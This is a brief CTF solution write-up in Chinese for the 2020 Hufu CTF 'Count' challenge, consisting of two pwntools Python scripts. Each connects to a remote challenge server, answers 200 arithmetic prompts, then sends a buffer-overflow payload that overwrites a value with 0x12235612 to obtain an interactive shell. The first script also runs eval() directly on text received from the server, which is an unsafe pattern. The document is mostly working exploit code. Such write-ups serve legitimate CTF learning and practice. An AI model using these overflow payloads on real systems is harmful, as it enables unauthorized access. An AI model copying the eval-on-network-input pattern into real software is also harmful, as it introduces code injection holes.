2020 虎符CTF Count

200次计算求值，结束直接给覆盖点然后启的SHELL

#coding=utf-8
from pwn import *
debug = 0
elf = ELF('./pwn')
#nc 39.97.210.182 40285
p = remote('39.97.210.182',40285)

def count():
	bstr = p.recvuntil('Math: ')
	mathstr = p.recvuntil('=',drop=True)
	result = eval(mathstr)
	p.sendline(str(result))
for i in range(200):
	count()
	print(i)

shellcode = 'a'*(0x88-0x24)+p64(0x12235612)
p.sendline(shellcode)


p.interactive()

from pwn import *
context.log_level = 'debug'
#39.97.210.182 40285
p=remote('39.97.210.182',40285)
def fun():
 	p.recvuntil('Math: ')
 	a=int(p.recv(2))
 	p.recvuntil('* ')
 	b=int(p.recv(2))
 	p.recvuntil('+ ')
 	c=int(p.recv(2))
 	p.recvuntil('+ ')
 	d=int(p.recv(2))
 	e=a*b+c+d
 	p.sendline(str(e))
for i in range(200):
 	fun()
p.send('a'*100+p32(0x12235612))
p.interactive()